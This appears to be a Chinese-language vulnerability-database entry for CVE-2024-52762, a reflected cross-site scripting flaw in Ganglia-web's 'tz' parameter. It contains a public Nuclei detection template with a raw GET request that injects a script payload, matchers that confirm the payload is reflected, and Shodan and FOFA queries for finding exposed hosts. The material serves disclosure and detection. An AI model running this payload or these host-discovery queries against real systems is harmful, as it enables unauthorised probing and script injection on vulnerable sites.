CVE-2024-52762: Ganglia Web Interface (v3.7.3 - v3.7.6) - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Ganglia Web Interface | POC: 已公开

漏洞描述

A cross-site scripting (XSS) vulnerability in the component /master/header.php of Ganglia-web v3.73 to v3.76 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the "tz" parameter.

PoC代码[已公开]

id: CVE-2024-52762

info:
  name: Ganglia Web Interface (v3.7.3 - v3.7.6) - Cross-Site Scripting
  author: DhiyaneshDk
  severity: medium
  description: |
    A cross-site scripting (XSS) vulnerability in the component /master/header.php of Ganglia-web v3.73 to v3.76 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the "tz" parameter.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2024-52762
    cwe-id: CWE-79
    epss-score: 0.00342
    epss-percentile: 0.56278
    cpe: cpe:2.3:a:ganglia:ganglia-web:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: ganglia
    product: ganglia-web
    shodan-query: http.html:"ganglia_form.submit()"
    fofa-query: body="ganglia_form.submit()"
  tags: cve,cve2024,ganglia,xss

http:
  - raw:
      - |
        GET /ganglia/?tz=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain)</script>">'
          - 'ganglia'
        condition: and

      - type: word
        part: content_type
        words:
          - "text/html"
# digest: 4a0a00473045022100c8c7ae8fe7d5eb5f7e073bfd28ad211ceddb5eada43de816e7597f9648ad6f0b022039dca5036296de9595448656665774430d15dc904898d96dc1a5fa7eae181a91:922c64590222798bb761d5b6d8e72950

相关漏洞推荐